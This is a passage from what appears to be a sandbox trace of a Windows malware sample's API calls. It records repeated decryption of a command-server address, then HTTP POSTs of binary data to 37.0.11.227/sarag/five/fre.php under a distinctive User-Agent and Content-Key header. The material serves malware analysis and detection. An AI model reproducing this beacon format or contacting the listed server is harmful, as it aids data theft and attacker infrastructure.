dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x161c) returned 0x860 [0275.667] Sleep (dwMilliseconds=0xea60) [0275.668] GetProcessHeap () returned 0x690000 [0275.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0275.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.681] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0275.691] GetProcessHeap () returned 0x690000 [0275.691] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0275.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.692] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.694] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.695] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.695] GetProcessHeap () returned 0x690000 [0275.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0275.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.701] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0275.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.702] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.707] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0275.707] GetProcessHeap () returned 0x690000 [0275.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.708] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.709] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.710] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.711] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.711] GetProcessHeap () returned 0x690000 [0275.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0275.712] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.712] GetProcessHeap () returned 0x690000 [0275.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0275.712] GetProcessHeap () returned 0x690000 [0275.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.713] GetProcessHeap () returned 0x690000 [0275.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0275.713] GetProcessHeap () returned 0x690000 [0275.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0275.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.714] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0275.727] GetProcessHeap () returned 0x690000 [0275.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0275.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.728] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.729] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.730] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.730] GetProcessHeap () returned 0x690000 [0275.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0275.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.731] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0275.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.732] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.733] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0275.733] GetProcessHeap () returned 0x690000 [0275.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.734] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0275.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.735] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0275.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.736] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0275.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.737] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0275.737] GetProcessHeap () returned 0x690000 [0275.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0275.737] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0275.738] GetProcessHeap () returned 0x690000 [0275.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0275.738] socket (af=2, type=1, protocol=6) returned 0x864 [0275.739] connect (s=0x864, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0275.764] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0275.764] GetProcessHeap () returned 0x690000 [0275.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0275.764] GetProcessHeap () returned 0x690000 [0275.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0275.765] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.766] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.766] GetProcessHeap () returned 0x690000 [0275.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0275.766] GetProcessHeap () returned 0x690000 [0275.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.767] GetProcessHeap () returned 0x690000 [0275.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0275.767] GetProcessHeap () returned 0x690000 [0275.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0275.768] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.769] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.769] GetProcessHeap () returned 0x690000 [0275.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0275.769] GetProcessHeap () returned 0x690000 [0275.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.769] send (s=0x864, buf=0x6ad508*, len=242, flags=0) returned 242 [0275.770] send (s=0x864, buf=0x6aba40*, len=159, flags=0) returned 159 [0275.770] GetProcessHeap () returned 0x690000 [0275.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0275.770] recv (in: s=0x864, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0275.841] GetProcessHeap () returned 0x690000 [0275.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0275.842] GetProcessHeap () returned 0x690000 [0275.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0275.843] GetProcessHeap () returned 0x690000 [0275.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0275.843] GetProcessHeap () returned 0x690000 [0275.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0275.843] closesocket (s=0x864) returned 0 [0275.844] GetProcessHeap () returned 0x690000 [0275.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0275.844] GetProcessHeap () returned 0x690000 [0275.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.844] GetProcessHeap () returned 0x690000 [0275.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0275.845] GetProcessHeap () returned 0x690000 [0275.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0275.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1620) returned 0x864 [0275.850] Sleep (dwMilliseconds=0xea60) [0275.851] GetProcessHeap () returned 0x690000 [0275.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0275.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.862] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0275.874] GetProcessHeap () returned 0x690000 [0275.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0275.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.884] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.885] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.886] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.886] GetProcessHeap () returned 0x690000 [0275.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0275.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.887] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0275.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.888] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.889] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0275.889] GetProcessHeap () returned 0x690000 [0275.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.890] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.891] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.892] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.892] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.892] GetProcessHeap () returned 0x690000 [0275.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0275.892] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.893] GetProcessHeap () returned 0x690000 [0275.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0275.895] GetProcessHeap () returned 0x690000 [0275.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.895] GetProcessHeap () returned 0x690000 [0275.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0275.896] GetProcessHeap () returned 0x690000 [0275.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0275.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.897] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0275.908] GetProcessHeap () returned 0x690000 [0275.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0275.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.909] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0275.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.910] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.911] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.911] GetProcessHeap () returned 0x690000 [0275.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0275.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.913] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0275.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.913] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0275.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.914] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0275.914] GetProcessHeap () returned 0x690000 [0275.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.925] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0275.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.930] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0275.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.931] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0275.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.933] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0275.933] GetProcessHeap () returned 0x690000 [0275.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0275.933] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0275.938] GetProcessHeap () returned 0x690000 [0275.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0275.938] socket (af=2, type=1, protocol=6) returned 0x868 [0275.938] connect (s=0x868, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0275.966] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0275.966] GetProcessHeap () returned 0x690000 [0275.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0275.966] GetProcessHeap () returned 0x690000 [0275.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0275.967] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.968] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.968] GetProcessHeap () returned 0x690000 [0275.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0275.969] GetProcessHeap () returned 0x690000 [0275.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.969] GetProcessHeap () returned 0x690000 [0275.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0275.969] GetProcessHeap () returned 0x690000 [0275.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0275.970] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.971] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.973] GetProcessHeap () returned 0x690000 [0275.973] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0275.973] GetProcessHeap () returned 0x690000 [0275.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.973] send (s=0x868, buf=0x6ad508*, len=242, flags=0) returned 242 [0275.974] send (s=0x868, buf=0x6aba40*, len=159, flags=0) returned 159 [0275.974] GetProcessHeap () returned 0x690000 [0275.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0275.974] recv (in: s=0x868, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0276.039] GetProcessHeap () returned 0x690000 [0276.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0276.040] GetProcessHeap () returned 0x690000 [0276.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0276.041] GetProcessHeap () returned 0x690000 [0276.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0276.042] GetProcessHeap () returned 0x690000 [0276.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0276.042] closesocket (s=0x868) returned 0 [0276.043] GetProcessHeap () returned 0x690000 [0276.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0276.043] GetProcessHeap () returned 0x690000 [0276.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0276.043] GetProcessHeap () returned 0x690000 [0276.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0276.043] GetProcessHeap () returned 0x690000 [0276.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0276.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1624) returned 0x868 [0276.046] Sleep (dwMilliseconds=0xea60) [0276.051] GetProcessHeap () returned 0x690000 [0276.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0276.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0276.092] GetProcessHeap () returned 0x690000 [0276.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0276.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.093] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0276.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0276.094] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 